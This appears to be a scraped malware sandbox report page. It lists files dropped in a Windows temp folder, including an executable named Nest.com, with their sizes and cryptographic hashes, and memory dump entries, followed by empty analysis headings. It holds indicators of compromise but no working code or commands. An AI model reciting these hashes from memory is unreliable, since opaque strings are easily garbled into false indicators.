MD5
644168493ce071400a03a714c8a523a9

SHA1
c0488a651996842da0a66f324092d7a9bf25e9f2

SHA256
74fbdabd5b0e6b66cb367c8fa1113f772e0f6b44eee0b9de89f7c2f34e7ac925

SHA512
afc18d4336d1bf0e0c1d2e971911d2492dc1d4f82fdbff6e9c49fa32c1264ade3caa279edfb78e81099c378a90e71374c0ebf32969d6cc1d3ef33fb69388d843

Download Submit
C:\Users\Admin\AppData\Local\Temp\Strict

Filesize
111KB

MD5
bd2e4f235c9a26f674a9ece3f744406b

SHA1
682ca5a6f3fdfe7cac329f904ad592218fda4e26

SHA256
af76696e3753cbc740d8904e85b53a6ffd3ec5a173be691a55aa3d3c762e74f7

SHA512
48c5cd3a0744cbcfec5ddee10af61158b9be4f1d6b3ca553b87401caa26ef2cca99a16af52bef7b5aedba180fdcd486c5afe25fd9d8b93e2e2aeac5e027259ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3577.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Towers

Filesize
14KB

MD5
c3fee390d05807005d0df17cd1d72b97

SHA1
f615d18a7c38e651f963e77d217babda281727d9

SHA256
7a6554adbe7f75c5cce9d4d4d26eee668ff6754cdc4965401d2cec684aee8c4f

SHA512
d6bb691846e7cf83c7684ff3d5d49e28faadeb77aa359daecffe1b7cf96fb407d4eeaf0b2d87455bb377df2cbf17deed41fad289f80239817a9cc899d3d7a1f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Triangle

Filesize
152B

MD5
aa06056e1608d9aa55ba8eb281a0b9e9

SHA1
4efec676560c47386f159941c2314c62de143223

SHA256
76b8963418f5921b48d91bcea4a6e25c6979946490bf0bc57a31fbd627d36de0

SHA512
f2f376eb58b352cd48b062fcc3fe599db731e963cf4c589a5aeec0d3b303ec97321ca269f8b0654cb1cae6e7960c1c8acc1b65b9b24c8145f884ab00fbff5cb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Volleyball

Filesize
75KB

MD5
1e69e10dc32468a15a6278c61465ba5f

SHA1
b3a0f9e211ca7240cc4b3e1f81d5bb5384f93884

SHA256
d0d25b316ce0072afbf2118f8fd7e859405eec8fd34f8ebc9efff0a6306ee42c

SHA512
6ef4a82efff4f6e58d062da81b8ee5b3c093ad60a9ec763b6290e1a31b0d74caa2de45d1b853cbd9959e2fc722d5aa44447515ba16f8f82f5bff39d170659f1f

Download Submit
\Users\Admin\AppData\Local\Temp\251969\Nest.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
memory/1860-693-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-694-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-696-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-695-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-692-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-691-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download
memory/1860-690-0x00000000038D0000-0x000000000391B000-memory.dmp

Filesize
300KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.